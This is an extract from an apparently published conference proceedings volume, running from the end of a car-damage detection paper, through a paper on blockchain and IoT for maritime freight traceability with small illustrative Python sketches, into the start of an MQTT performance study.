The result of Mask Scoring RCNN in Fig. 7 shows that, even though the different types of damage in the image are not totally separated, the damage can still be detected and the classification is correct. With Mask RCNN, the classification and segmentation are clearly more difficult: the segmentation becomes worse and the classification confidence score is lower. Therefore, Mask Scoring RCNN performs better. In general, Mask RCNN has good identification accuracy but cannot handle overlapping targets very well, while Mask Scoring RCNN completes both tasks, instance segmentation and classification, well and produces the best output. Table 1 shows that the proposed Mask Scoring RCNN method outperforms Mask RCNN: its mask accuracy is 96.9%, higher than the mask accuracy of Mask RCNN (95.93%). In addition, Mask Scoring RCNN is faster than Mask RCNN, which makes it the better choice. The per-class accuracy of the test results was encouraging: 70% for headlamp, 67.5% for door, 68% for hood, 64.6% for rear bumper, and 71% for front bumper, giving an average of around 70% on the whole dataset.


Table 1. Comparison of test results (Mask RCNN and Mask Scoring RCNN).

Algorithm | Mask Accuracy (MIoU) (%) | Total loss | Running speed (fps)
Mask RCNN | 95.93 | 0.198 | 4.27
Mask Scoring RCNN | 96.9 | 0.181 | 4.71

5 Conclusion To resolve traffic accident compensation claims quickly, a detection algorithm based on deep learning and transfer learning is used. After testing, we demonstrate that the proposed car damage classification system based on Mask Scoring RCNN achieves good segmentation, classification and recognition results in different scenarios. However, there is always room for improvement: in future work, having more data can definitely improve the training results and show the full power of the chosen algorithm.

References
1. Abdulla, W.: Mask R-CNN for object detection and instance segmentation on Keras and TensorFlow. GitHub (2017)
2. Davis, L.S., Bodla, N.: Soft-NMS – improving object detection with one line of code. In: Proceedings of the IEEE International Conference on Computer Vision (2017)
3. Girshick, R.: Fast R-CNN. In: International Conference on Computer Vision (ICCV) (2015)
4. Girshick, R.: Rich feature hierarchies for accurate object detection and semantic segmentation (2014)
5. He, K., Gkioxari, G.: Mask R-CNN. In: ICCV, pp. 2980–2988 (2017)
6. Tychsen-Smith, L., Petersson, L.: Improving object localization with fitness NMS and bounded IoU loss. arXiv:1711.00164
7. Lei, Y., He, X.: Breast tumor segmentation in 3D automatic breast ultrasound using Mask Scoring R-CNN. Medical Physics (2021)
8. Chen, L.-C., Hermans, A.: MaskLab: instance segmentation by refining object detection with semantic and direction features. In: CVPR (2018)
9. Li, S., Ming, Y.: Garbage object recognition and classification based on Mask Scoring RCNN. In: International Conference on Culture-oriented Science & Technology (ICCST) (2020)
10. Sun, S.R.: Faster R-CNN: towards real-time object detection. In: Advances in Neural Information Processing Systems (NIPS) (2015)
11. Urtasun, M.B.: Deep watershed transform for instance segmentation. In: IEEE Conference on Computer Vision and Pattern Recognition, pp. 2858–2866 (2017)
12. Wang, X., Huang, Z.: Mask Scoring R-CNN. In: CVPR (2019)
13. Liang, X., Wei, Y.: Proposal-free network for instance-level object segmentation. arXiv preprint arXiv:1509.02636 (2015)
14. Tian, Y., Yang, G.: Instance segmentation of apple flowers using the improved Mask R-CNN model. Biosyst. Eng. 193, 264–278 (2020). https://doi.org/10.1016/j.biosystemseng.2020.03.008
15. Zhang, Q., Bian, S., Chang, X.: Vehicle-damage-detection segmentation algorithm based on improved Mask RCNN. IEEE Access, 6997–7004 (2020)

Blockchain and IoT for Real-Time Decision Support for the Optimization of Maritime Freight Transport Networks M. H. Rziki1 , N. Mansour2(B) , A. E. Boukili2 , and M. B. Sedra3 1 Laboratoire Informatique et Applications, Formation Doctorale Théories et Applications,

Faculté des Sciences, Université Moulay Ismail, Meknès, Morocco 2 Equipe de Physique Théorique et Modélisation (PTM), Département de Physique Faculté des

Sciences et Techniques Errachidia, Université Moulay Ismail Errachidia, B. P N 509, Boutalamine, 52000 Errachidia, Morocco [email protected] 3 Material and Subatomic Physics Laboratory (LPMS), FSK, University Ibn Tofail, Kenitra, Morocco

Abstract. In the world of import-export, the transport of goods by sea is a must; indeed, nearly 90% of world trade is carried out this way. For this reason, companies and states compete in ingenuity to invent the container transport of tomorrow. The objective of this work is to study the role of IoT and blockchain smart-contracting technologies in maritime freight transport networks and whether they would bring real added value in the case of a logistics company. The results showcase the potential of using blockchain smart contracting in the environment of maritime freight transport networks. Keywords: Internet of things · Big Data · Data analysis · Optimization · Blockchain · Maritime transport · Real-time decision

1 Introduction Maritime transport represents an important and competitive economic and financial factor for every company and country. The problems associated with this type of transport are a source of maritime traffic congestion, producing centuries of lost time in total, inevitable traffic jams in the ports, losses of goods, and consequently enormous economic losses. Ensuring the smooth transit and proper routing of ships guarantees the smooth running of the voyages, the passengers and of course the goods, and makes it possible to respect the deadlines of the orders that have been placed. Big Data presents a potential solution to support maritime transport networks, for effective and efficient use and better optimization of routes and costs, based on real-time information sharing between the various stakeholders (drivers, authorities, companies or others). Here we cite the enormous impact © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 377–389, 2023. https://doi.org/10.1007/978-3-031-35251-5_37


Blockchain technology finds many applications and is increasingly establishing itself as a safe, robust, and efficient solution. Several sectors are taking a close interest in it and see blockchain as a new way to address traceability and security issues. In maritime freight transport networks, blockchain makes it possible to eliminate or reduce the delays observed in the authentication of documents and information, so goods can circulate more freely and more quickly. The maritime sector also involves a large number of actors: customs and port authorities, banks, shipping brokers, clearing houses, and so on. Each actor intervenes at a specific stage of the supply chain and has a specific role to play. However, almost all documentation in the sector is still paper-based. Sales contracts, agreements, port documents, letters of credit, and other administrative documents regularly go back and forth. As global trade ecosystems grow, the cost of the trade documentation needed to process shipped goods soars, and financial transactions take longer. To reduce this time and to act on the cost of operations, actors in the sector are increasingly considering blockchain-based smart contracts, since this approach promotes transparency while reducing the risk of human error. Faced with this development, it becomes legitimate to question the place of this technology and the consequences of its generalization. To do so, we focus on the container shipping sector, which is marked by strong challenges in terms of traceability of goods, in order to assess the real impact and consequences that this technology can bring.

1.1 Big Data, Blockchain and Internet of Things as Solution for Logistics and Freight Transportation Problems

Numerous research efforts in maritime transport aim to improve the integration of IoT solutions or to optimize intelligent transport systems, yet very little research has investigated how to use real-time Big Data in shipping. This article addresses a study that aims to minimize traffic in order to optimize the voyage of a ship travelling a predefined route, while maximizing information sharing between the various users and collaborators, based on Big Data tools and their real-time exploitation, operational research, and the modelling of operating systems. In the context of the current work, real-time Big Data and its tools are adapted to solve problems related to the maritime transport of goods. The work is divided into two parts: the first explains how the Internet of Things works and the relationship between IoT and maritime freight transport networks; the second proposes a concrete solution based on blockchain technology for the traceability of transport documents, for which a feasibility analysis was carried out, together with the implementation procedure of this solution in the case of maritime freight transportation.


1.2 Overview of the Concept of Big Data

Although Big Data is a buzzword in both academia and industry, its meaning is still shrouded in significant conceptual vagueness. The term is used to describe a wide range of concepts: from the technological ability to store, aggregate, and process data, to the cultural change that pervades business and society, both overwhelmed by information overload [1]. To better understand what Big Data is, we distinguish the 3 Vs that define it: Volume, Velocity, and Variety.

– Volume: the amount of data matters. With big data, high volumes of low-density, unstructured data must be processed. This can be data of unknown value, such as Twitter data feeds, clickstreams on a web page or a mobile app, or sensor-enabled equipment. For some organizations, this might be tens of terabytes of data; for others, hundreds of petabytes.
– Velocity: the fast rate at which data is received and (perhaps) acted on. Normally, the highest-velocity data streams directly into memory rather than being written to disk. Some internet-enabled smart products operate in real time or near real time and require real-time evaluation and action.
– Variety: the many types of data that are available. Traditional data types were structured and fit neatly in a relational database. With the rise of big data, data comes in new unstructured types. Unstructured and semi-structured data types, such as text, audio, and video, require additional preprocessing to derive meaning and support metadata [3].

Figure 1 shows the proposed generic framework for the supply problem using big data analysis. The framework presents ways to integrate the 3 Vs of Big Data and shows possible ways to handle inter- and intra-heterogeneity [4]. Big Data therefore makes it possible to analyze, measure, and arbitrate any type of production, whether human activity or user feedback; it is thus used to guide and improve decision-making in order to optimize the result.

Operational Research and Optimization

Operational research occupies a growing place in industry, logistics, and transport [7]. It can be defined as the set of rational methods and techniques oriented towards the search for the best way of operating in order to achieve the desired, or best possible, result. It belongs to the family of decision aids insofar as it offers conceptual models for analyzing and controlling complex situations, enabling decision-makers to understand and assess the issues and to arbitrate or make the most effective choices. This field makes extensive use of mathematical reasoning (logic, probability, data analysis) and process modelling. It is strongly linked to systems engineering as well as to information-system management [8]. Operational research provides a set of scientific (mathematical and computational) methods for analyzing organizational phenomena, dealing with the maximization of a profit or the minimization of a cost in order to make optimal, or near-optimal, decisions in complex problems. Operational research is a decision-support tool [12].


Fig. 1. Proposed framework for integrating big data into the supply problem

Among the basic techniques of operations research we can cite: modelling, decision theory, graph theory, shortest-path search, scheduling, dynamic programming, the simplex method, linear programming, Markov chains, and simulation. The study we analyze concerns the use of Big Data in the field of maritime transport, which produces a large amount of data from various sources and in different formats. The authors of [11] analyzed the current applications of Big Data and the various Big Data innovations in maritime transport, mainly applicable in port operations, weather routing, monitoring/tracking, and security. They concluded that big data analytics can provide an in-depth understanding of causalities and correlations in shipping, thereby improving decision-making. However, there are major challenges for efficiently collecting and processing data in maritime transport, such as technological challenges and challenges due to competitive conditions. Finally, the authors offer a future perspective on the use of Big Data in maritime transport [11].
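To make the shortest-path technique cited above concrete, here is a minimal sketch (not taken from the study) that applies Dijkstra's algorithm to a small, hypothetical port graph; the port names and edge costs are invented for illustration and could stand for sailing time, fuel, or any other additive criterion.

```python
import heapq

def dijkstra(graph, source):
    """Shortest cumulative cost from `source` to every reachable port.

    `graph` maps a port to a list of (neighbour, cost) edges.
    """
    dist = {source: 0.0}
    queue = [(0.0, source)]
    while queue:
        d, port = heapq.heappop(queue)
        if d > dist.get(port, float("inf")):
            continue  # stale queue entry
        for neighbour, cost in graph.get(port, []):
            nd = d + cost
            if nd < dist.get(neighbour, float("inf")):
                dist[neighbour] = nd
                heapq.heappush(queue, (nd, neighbour))
    return dist

# Hypothetical network: edge weights are illustrative sailing costs only.
ports = {
    "Tangier Med": [("Algeciras", 1), ("Valencia", 4)],
    "Algeciras": [("Valencia", 2), ("Marseille", 6)],
    "Valencia": [("Marseille", 3)],
    "Marseille": [],
}
print(dijkstra(ports, "Tangier Med"))
```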


2 Big Data and IoT Technologies in Maritime Freight Transportation

The Internet of Things (IoT) implies a profound evolution of the Internet we know. It is no longer only about connecting tablets, computers, and phones to each other, but about making every element of the physical world communicate, somehow abolishing the border between physical objects and the virtual world. It is the emerging, very fast-growing, and multidimensional character of the IoT – the diversity of the objects concerned, the possible application cases, and the associated technologies – that makes it difficult to grasp the social transformations and environmental impacts caused by its massive development. The Internet of Things [5] is an essential component of Big Data; its real-time aspect allows analyses to be run simultaneously so that decisions can be made in real time. In the maritime freight sector, which connects suppliers and their customers all over the world through container shipping, each box on a container ship is no longer just a box but a computer specialized in the safe transport of goods around the world: a container is a connected object. Instead of tracking containers by hand or with a hand-held bar-code reader, IoT sensors can automate much of the process. Here are some ways that logistics technology can help the maritime industry. Tracking cargo: shippers and maritime companies can track where cargo is, based on IoT sensors on the smart container or on the items inside. This can save time for all parties, and the shipper or freight forwarder can follow the items as they cross the ocean and arrive in port. Smart containers can be used to keep tabs on the goods inside by monitoring and sharing alerts about ambient light and temperature changes. They can track doors opening and closing as well as other unexpected actions, and they share their location, allowing users to know where a container is at any given time.

2.1 Smart Containers

One of the problems of the shipping container is its inactivity: during its useful life, a container spends more than half of the time being repositioned or idle. This is therefore an essential point to optimize in order to make tomorrow's supply chains much more efficient, and the Smart Container [5] seems to be the key to solving this problem. Concretely, two 20-ft smart containers can be joined to form a single 40-ft container; the handling takes approximately 30 min, according to Francisco Aguilar, co-founder of Connectainer. This simple and well-thought-out solution to a central problem in supply-chain management would avoid 12% of unnecessary container movements in international transport. The concept of the Smart Container consists of making the container intelligent so that it can communicate useful, targeted, real-time information. Smart containers, like most connected objects, generate data with the characteristics specific to Big Data: voluminous, heterogeneous, incomplete, sometimes erroneous, and acquired and processed in near real time.


Using a box filled with sensors, these technologies make it possible to identify remotely, in real time and at every point of the journey, the precise location of the container, its temperature, humidity, level of vibration, and even door openings. Today, 80% of the volume of goods traded in the world transits by sea, and overall there are 35 million maritime containers. Yet, according to the UN, a third of the food produced in the world for human consumption is lost or wasted, and a significant part of these losses is due to a loss of quality of fresh food during transport caused by temperature changes in refrigerated containers. The smart container is a solution for reducing waste by precisely detecting the places and times when the fresh-food chain has been broken. It also generates a large amount of data, which can be strategic for shipowners, carriers, logisticians, and manufacturers alike, in order to reduce the number of incidents, anticipate the management of unforeseen events or anomalies, optimize inventory management, and reduce transport costs. This solution provides an overview of all transport activity and completes the digital supply chain.
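To make the smart-container data flow concrete, the following is a minimal sketch, not drawn from the paper, of a telemetry record and a simple threshold rule of the kind used to detect a break in the cold chain; the field names and the 8 °C threshold are assumptions made for illustration.

```python
from dataclasses import dataclass

@dataclass
class ContainerTelemetry:
    container_id: str
    latitude: float
    longitude: float
    temperature_c: float
    humidity_pct: float
    door_open: bool

def cold_chain_alerts(readings, max_temp_c=8.0):
    """Flag readings that break the assumed cold-chain threshold
    or report a door opening during transit."""
    alerts = []
    for r in readings:
        if r.temperature_c > max_temp_c:
            alerts.append((r.container_id, "temperature above threshold"))
        if r.door_open:
            alerts.append((r.container_id, "door opened in transit"))
    return alerts

readings = [
    ContainerTelemetry("MSKU1234567", 35.88, -5.50, 4.2, 80.0, False),
    ContainerTelemetry("MSKU1234567", 36.10, -5.10, 9.6, 82.0, True),
]
print(cold_chain_alerts(readings))
```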

3 Adoption of Blockchain in Maritime Freight Transportation

How can we talk about the business issues of container transport without mentioning safety and traceability? On these questions, blockchain technology seems to be a perfectly adapted solution. In the maritime transport of goods by container, several problems arise. Traceability and security issues: verification processes are long and numerous; the journey is strewn with manual checks that require opening the containers several times to check the transported goods and their condition. The documentation relating to container transport is also subject to frequent checks and is still on paper; if a document is missing at any stage of the process, the entire container risks being immobilized. These repeated checks significantly extend shipping times. During transport, it is also essential to preserve the integrity of products that must be shipped under specific environmental parameters. Blockchain technology is not limited to bitcoins and cryptocurrencies: it finds many applications and is increasingly establishing itself as a safe, robust, and efficient solution, and several sectors see it as a new way to address traceability and security issues. This is particularly the case in freight transport, where the use of this technology for the maritime transport of goods will save the sector several billion dollars. At the same time, experiments are multiplying that use the blockchain as a means of tracing operations and products imported and exported around the world. Blockchain allows data to be recorded and tracked at every stage of a supply chain. For their part, suppliers of agri-food products could create a blockchain by adding information on the fertilizers used, the machines operated, and the pesticides applied. In any case, the blockchain is proving very useful for the sector. Data relating to storage conditions and shipment details can also be saved on the blockchain, with the advantage that they can be consulted at any time. Each actor in the supply chain can consult them whenever they wish: the blockchain will serve as a register


to have all the information on the products. Thus, it will be possible to inform users about the hygiene conditions and the expiry date of the items.

3.1 What is Blockchain?

Blockchain [5] is a technology introduced in 2008 by Satoshi Nakamoto. It was born with the invention of Bitcoin, a digital currency that is managed neither by states nor by banks and that can be transferred electronically and quickly. Although the blockchain was created to store the history of transactions related to Bitcoin, it has over time been adopted in several other sectors [9]. Blockchain technology is a decentralized solution for storing and transmitting information. The chain created by the different blocks of data is shared and distributed, which allows everyone to verify its integrity and therefore the veracity of the information it contains. Container transport is subject to various stages of control throughout the journey, from the shipper to the end customer. During these checks (nearly 30 during international transport), the containers are opened for port examinations and documents are exchanged; all these phases can be a source of error or misappropriation. The blockchain, however, offers effective solutions for the control and management of logistics flows.

Blockchain Properties

The blockchain provides some important properties [2]. Decentralization: data is replicated in a distributed network of nodes, eliminating several risks that are present when data is stored centrally; there is no single point of failure. Tamper resistance: a consensus protocol is used to validate the blocks of data appended to the ledger, and the decentralized nature of the blockchain makes it extremely difficult for anyone to tamper with the stored data. Security: in addition to the immutability gained from distributed consensus, blockchains use digital signatures and strong cryptographic primitives to sign and verify the data submitted to the network. Each user uses a private key to generate a signature for each blockchain transaction; this signature confirms that the transaction came from that particular user and allows its validity to be verified. The signature cannot be altered once it has been issued [13]. All the data that makes up a blockchain is thus encoded: in order to perform operations on some data, you need to possess the private key corresponding to that data, proving that you are entitled to perform the operation; otherwise, the blockchain node that received the request will simply discard it as invalid.
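The tamper-resistance and integrity properties described above can be illustrated with a minimal hash-chained ledger. This is a didactic sketch only; it omits consensus, signatures, and networking, and is not the implementation of any real blockchain.

```python
import hashlib, json

def block_hash(block):
    """Deterministic SHA-256 hash of a block's contents."""
    payload = json.dumps(block, sort_keys=True).encode()
    return hashlib.sha256(payload).hexdigest()

def append_block(chain, data):
    prev = chain[-1]["hash"] if chain else "0" * 64
    block = {"index": len(chain), "data": data, "prev_hash": prev}
    block["hash"] = block_hash({k: block[k] for k in ("index", "data", "prev_hash")})
    chain.append(block)

def is_valid(chain):
    """Any modification of a past block breaks the hash links."""
    for i, block in enumerate(chain):
        expected = block_hash({k: block[k] for k in ("index", "data", "prev_hash")})
        if block["hash"] != expected:
            return False
        if i > 0 and block["prev_hash"] != chain[i - 1]["hash"]:
            return False
    return True

chain = []
append_block(chain, {"container": "MSKU1234567", "event": "loaded"})
append_block(chain, {"container": "MSKU1234567", "event": "customs cleared"})
print(is_valid(chain))           # True
chain[0]["data"]["event"] = "x"  # tampering attempt
print(is_valid(chain))           # False
```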


3.2 Problems Solved by Blockchain Technology

Better product traceability: the blockchain improves reliability, because it improves the security and traceability of shipments. In the food sector, it becomes possible to quickly and simply trace the entire supply chain if a problem is detected; it is therefore a public health issue. Very concretely, goods can be entered in the database, and the information concerning them is then updated regularly from their manufacture to their delivery to the end customer. In this way, we obtain a complete, transparent register with distributed management that makes any unilateral modification impossible. To make the system even simpler, the necessary information can be entered into the database manually through direct entry, or more automatically: the widespread use of smartphones and connected sensors facilitates the feedback of information and, coupled with blockchain technology, makes it possible to easily trace products.

The fight against fraud: this technology makes it possible to fight fraud in the supply chain. More than ever, companies are scrutinized and exposed to scandals, such as the one in 2013 that brought to light a fraud involving horse meat in frozen meals. A 2016 study puts the cost of supply-chain fraud at 40 billion dollars. Thanks to this technology, it is easy to know what information was written, by whom, and when; the blockchain allows full transparency, because it is impossible to modify the data unilaterally.

Supply-chain optimization: using the blockchain means making a powerful tool available to the company. Flow management is improved by the automation of certain processes made possible by this innovation used in conjunction with sensors and connected objects.

Health issues/food contamination: the authorities need to trace the entire supply chain from manufacturing to distribution in order to identify the origin of a malfunction and withdraw the product from circulation. The current organization of maritime transport makes this operation complicated: the use of paper documents and the difficulty in retrieving information slow down the operation, which can take several days. The transparency of a blockchain ledger can reduce the time required and ensure the safety of potential consumers.

The Different Types of Blockchains

There are several types of blockchain, categorized according to network accessibility and validation rights (Dib et al. 2018).

Public blockchains: they are open; the blockchain can be downloaded and read without restriction and its source code is public. There is no condition to join the network or to become a block validator. Governance, i.e. all the operating rules of the blockchain, is open and decentralized. There are many public blockchains, the most famous being Bitcoin (Nakamoto 2009) and Ethereum (Buterin 2013). A large number of nodes ensures better robustness of the network, and the ease of access to this type of blockchain makes it attractive.

Private blockchains: they are generally deployed within private networks, with trusted actors, because of the sensitive nature of the information entered in the blockchain, which one does not want to share on a public blockchain. Only nodes accepted by a central authority can join the network and become validators. Often one of the actors manages this blockchain and grants membership authorizations; this particular actor is thus the guarantor of, and responsible for, the transaction system.


Hybrid blockchains: they combine a private blockchain, containing the information that one does not wish to share, and a public blockchain on which other types of information are stored, such as the hashes of the private blockchain's blocks. Using both types of blockchain, private and public, makes it possible to benefit from the advantages offered by each of them.

Fig. 2. Differences in the different types of blockchains (Tessier, 2019)

Consortium blockchains: these blockchains [14] allow actors, sometimes competitors, to collaborate by sharing the information stored on a private blockchain that they manage collaboratively. The use of a common blockchain allows them to streamline their exchanges and establish mutual trust. Each actor has the right to validate blocks and participates in the governance of the network.

4 What is Blockchain's Value Proposition in Maritime Freight Transportation?

In the first part of this section, we explain how the blockchain works as a technology guaranteeing security and trust in transactions, in particular through smart contracts. In the second part, we present the interest of the blockchain for building trust and improving fluidity in logistics processes.

4.1 Smart Contracts

Smart contracts were introduced by [10] as computer protocols that facilitate, verify, or enforce the negotiation or performance of a contract. In a blockchain, they take the form of a computer program that can automatically execute transactions on the blockchain,


i.e. the terms of a contract, when an event or condition occurs. This can be done automatically, without human intervention and without the need for a third party [6]. In first-generation blockchains, the transactions that can be recorded are limited to simple values, for example cryptocurrency exchanges. Second-generation blockchains bring a major change: in addition to their usual abilities to verify, propagate, and synchronize the blockchain, nodes can now run code like a Turing machine (Jiao et al. 2018). This code is called a smart contract and can be executed by a node automatically or on call. Smart contracts can also communicate with each other using messages. This new capability, added in second-generation blockchains, allows the recording of transactions that can be conditioned by different events and by the different actors involved in the transaction. A smart contract can be used to define identification processes concerning an object, for example a cargo container. It is then possible to define transactions that correspond to changes of state applied to this object and performed by actors whose identity must be verified: displacement, change of responsibility, administrative authorization, temperature read by a sensor, position, and so on. Smart contracts will thus contribute to introducing automation into logistics processes. A contract can be triggered at a date or over a defined time interval when it is registered in the blockchain; each time its conditions are met, the smart contract performs the tasks for which it is programmed. Smart contracts can also manage and certify that the process of automating tasks on these documents takes place correctly and thus without delay. This automation allows a very significant streamlining of information processing.
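As a hedged sketch of this conditional execution (not on-chain code and not tied to any particular platform), the following models a contract clause that fires automatically when a reported sensor event meets its condition; the class name, the temperature threshold, and the in-memory ledger are assumptions made for illustration.

```python
class TemperatureClause:
    """Toy model of a smart-contract clause: when a reported reading
    violates the agreed condition, the clause records a claim on the
    (simulated) ledger without any human intervention."""

    def __init__(self, ledger, container_id, max_temp_c):
        self.ledger = ledger
        self.container_id = container_id
        self.max_temp_c = max_temp_c

    def on_event(self, reported_temp_c):
        if reported_temp_c > self.max_temp_c:
            self.ledger.append({
                "type": "claim",
                "container": self.container_id,
                "reason": f"temperature {reported_temp_c} > {self.max_temp_c}",
            })

ledger = []  # stands in for the blockchain ledger
clause = TemperatureClause(ledger, "MSKU1234567", max_temp_c=8.0)
clause.on_event(5.0)   # condition not met: nothing recorded
clause.on_event(11.3)  # condition met: a claim is notarized
print(ledger)
```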

5 A Model for Using the Blockchain Transaction Process

Our approach consists initially in elaborating an abstract model on which a generic method is built, so that it can be adapted to many use cases in which one seeks to register information in a blockchain in addition to an information system that reacts to different events (see Fig. 3). This situation is very common in many logistics or supply-chain management processes. The goal is to certify and be able to trace the transactions related to these events, and in particular to be able to retrieve the operations, their nature, the possible participants, and the dates of their execution in the event of a dispute. In a process without blockchain, events are transmitted directly to the information system (dotted arrow in Fig. 3).

Fig. 3. General model presenting the modes of interaction between events, an information system and a blockchain.


In the proposed model, where a blockchain is introduced, the information system communicates with the blockchain in the form of requests, allowing it to notarize information in the blockchain (i.e. to register it in a tamper-proof way) and then to access it with the certainty that it has not been altered. In addition, events can also be notarized in the blockchain, making it possible to reliably trace the entire process automatically and immediately. This blockchain is replicated on several servers, and synchronization and verification mechanisms ensure that the copies are identical. In our model, the purpose of the blockchain is to ensure the consistency of a set of critical data characterizing the traceability of operations. It raises alerts in the event of abnormal events, in particular during attempts to alter data, which result in a mismatch of these data. It may be, for example, an object whose movements are subject to authorization: these permissions are stored in the blockchain via a smart contract, and the object emits its geolocation at regular time intervals, which is also recorded in the blockchain. In the event of a mismatch between authorizations and geolocation, the blockchain raises an alert. In the following section, we apply this model to the traceability of maritime freight transactions.

6 Maritime Freight Transportation

With blockchain, it becomes possible to process data digitally and automatically, making data processing shorter and more efficient. Figure 4 shows the data exchanges for each event during the handling of a container in the port, which undergoes several operations, such as loading, with a unique identifier. Critical tracking information for this container is recorded on the blockchain, and the list of operations to be performed on the container is recorded in the blockchain by the information system. Registration in the blockchain provides unfalsifiable and reliable traceability of the whole container-tracking process. The blockchain can be separated into two subsets: the ledger, which is the part in which transactions are recorded, and the smart contracts, which perform the automated data processing. As shown in Fig. 4, there are several types of smart contracts in our use case, each assigned to a particular task.

1. A smart contract receives traceability information, transmitted by operators and by sensors, and registers it in the blockchain. In some cases, the data presented must coincide with data already entered; if this is not the case, the smart contract must generate an alert that is sent to the information system (for example, the position of a container which is not in motion).

A container is monitored by different operators. We detail here the different stages of a trip that give rise to registrations or accesses in the blockchain.

1. The operator passes his badge in front of the container's connected card reader, which is dedicated to an authentication process. This connected card reader emits a


Fig. 4. Interaction of events with the information system and the blockchain integrating smart contracts.

signal containing its identifier as well as that of the operator, triggering the generation of an association smart contract. This smart contract reads previous records in the blockchain and verifies that there is a validated travel request corresponding to this association. Once this verification is done, the smart contract registers in the blockchain that the movement is active. This contract is signed by the operator with their private key and registered in the blockchain; registration requires a validation step that authorizes the request, or not, against the processes managed by the information system.

2. Once the movement has been made, the operator indicates to the blockchain that the operation is completed. The movement-request smart contract ensures that the container is in place.

3. The operator identifies themselves with their private key, which generates a record in the blockchain. This instantiates a travel-request smart contract that contains the terms of the operation: the container to be moved, the starting position, and the arrival position.
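The steps above can be summarized with a small workflow sketch; the function names and the in-memory "blockchain" list are assumptions made for illustration and do not correspond to the authors' implementation.

```python
blockchain = []  # simulated ledger of records

def create_travel_request(operator, container, start, destination):
    """Corresponds to the travel-request smart contract (step 3 in the text)."""
    record = {"type": "travel_request", "operator": operator, "container": container,
              "from": start, "to": destination, "status": "validated"}
    blockchain.append(record)
    return record

def badge_scan(operator, container):
    """Step 1: the association contract checks that a validated travel
    request exists before activating the movement; otherwise it alerts."""
    for rec in blockchain:
        if (rec.get("type") == "travel_request" and rec["operator"] == operator
                and rec["container"] == container and rec["status"] == "validated"):
            blockchain.append({"type": "movement", "container": container,
                               "operator": operator, "status": "active"})
            return True
    blockchain.append({"type": "alert", "reason": "no validated travel request"})
    return False

def complete_movement(operator, container):
    """Step 2: the operator declares the movement finished."""
    blockchain.append({"type": "movement", "container": container,
                       "operator": operator, "status": "completed"})

create_travel_request("OP-42", "MSKU1234567", "Quay A", "Yard B")
badge_scan("OP-42", "MSKU1234567")
complete_movement("OP-42", "MSKU1234567")
print([r["type"] for r in blockchain])
```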


7 Conclusion

We have presented the fundamental concepts of the blockchain as well as its contribution to logistics, and we have introduced a model to securely record and certify real-world events in the blockchain. Smart contracts have been presented, in particular for monitoring the movement of a container of goods. These innovative tools and technologies are multiplying, and they offer effective and sometimes surprising solutions to the problems encountered by maritime transport today. The integration of IoT and blockchain seems to be a perfect match for facilitating, in a highly secure way, collaborative activities (sales, manufacturing, supply chain) between multiple partners in an open ecosystem. These technologies allow us to envisage, in the near future, a set of opportunities for the sector such as non-polluting and autonomous ships, a reduction in transport costs, better management of the supply chain, and improved security and traceability. All of these elements demonstrate the dynamism of the logistics sector, especially maritime logistics, and its importance in the economic world of tomorrow.

References
1. De Mauro, A., Greco, M., Grimaldi, M.: What is big data? A consensual definition and a review of key research topics. AIP Conf. Proc. 1644, 97 (2015)
2. Peronja, I., Lenac, K., Glavinović, R.: Blockchain technology in maritime industry. Sci. J. Maritime Res. 34, 178–184 (2020)
3. Gandomi, A., Haider, M.: Beyond the hype: big data concepts, methods, and analytics. Int. J. Inf. Manag. 35, 137–144 (2015)
4. Surya Prakash, S.: Big Data analytics in supply chain management: some conceptual frameworks. Int. J. Automation and Logistics (2016)
5. IoT et Blockchain combinés: Quels sont les usages? https://www.ibm.com/downloads/cas/1BVOLMED
6. Buterin, V.: A next generation smart contract & decentralized application platform, Ethereum white paper (2015). https://github.com/ethereum/wiki/wiki/White-Paper
7. Meunier, F.: Introduction à la recherche opérationnelle. Université Paris Est
8. Haurie, A.: Recherche opérationnelle. L'Actualité économique 42(2), 324 (2015)
9. Irannezhad, E.: Is blockchain a solution for logistics and freight transportation problems? Transp. Res. Procedia 48, 290–306 (2020)
10. Szabo, N.: Formalizing and securing relationships on public networks. First Monday 2(9) (1997)
11. Jović, M., Tijan, E., Marx, R., Gebhard, B.: Big data management in maritime transport
12. Konan, Y.S.: Programmation linéaire. Université Félix Houphouët-Boigny, 2016–2017
13. Tasca, P., Tessone, C.: A taxonomy of blockchain technologies: principles of identification and classification. Ledger 4 (2019). https://doi.org/10.5195/ledger.2019.140
14. Lasmoles, O., Diallo, M.T.: Impacts of blockchains on international maritime trade. J. Innov. Econ. Manag. 2022/1(37), 91–116

MQTT Protocol Analysis According to QoS Levels and SSL Implementation for IoT Systems Mouna Boujrad1(B) , Mohammed Amine Kasmi2 , and Noura Ouerdi1 1 Arithmetic, Scientific Computing and their Applications Laboratory (LACSA), Faculty of

Sciences (FSO), Mohammed First University (UMP), 60000 Oujda, Morocco [email protected] 2 Computer Sciences Research Laboratory (LARI), Faculty of Sciences (FSO), Mohammed First University (UMP), 60000 Oujda, Morocco

Abstract. In recent years, new challenges have arisen with the growing number of systems based on the Internet of Things (IoT), creating a heterogeneous environment that requires revisiting old protocols with up-to-date measurements and characteristics. WSNs (wireless sensor networks) are one of the many areas being studied for improvement in IoT systems, since in the IoT, WSNs are composed of resource-limited devices. This very particular constraint requires new protocols to ensure good data-transmission performance. In this paper we present an analytic study of the MQTT (Message Queuing Telemetry Transport) protocol, one of the most popular protocols used in IoT-based systems, which allows message transfer between two devices using different technologies; it is also known as lightweight and efficient, since it takes into consideration the constrained devices of IoT systems. We evaluate its performance at the different quality-of-service (QoS) levels, with and without a security implementation. Keywords: MQTT · IoT · WSNs · QoS · SSL

1 Introduction IoT (Internet of Things) has become immensely used in various areas such as industry, smart health, e-learning, and our daily lives. According to a Transforma Insights report, about 12.9 billion devices were connected in 2022 [1], and this number is expected to grow to 28.5 billion devices by 2030. With this rapid increase of interconnected smart devices, new communication protocols have been developed to respond to IoT characteristics, which can be challenging due to the limited resources of IoT devices: execution time, memory, and energy. However, many new protocols have proven efficient in IoT systems, such as MQTT (Message Queuing Telemetry Transport), CoAP (Constrained Application Protocol) [2], XMPP (Extensible Messaging and Presence Protocol) [3], DDS (Data Distribution Service) [4], and AMQP (Advanced Message Queuing Protocol) [5]. Each of these protocols has specific features and properties that make it suitable for message transfer and communication in IoT systems.


In this paper, we present a performance analysis of the MQTT protocol at the three QoS (Quality of Service) levels, with and without security implemented; we use SSL to secure the protocol, since MQTT initially came with no built-in security.

2 Related Work

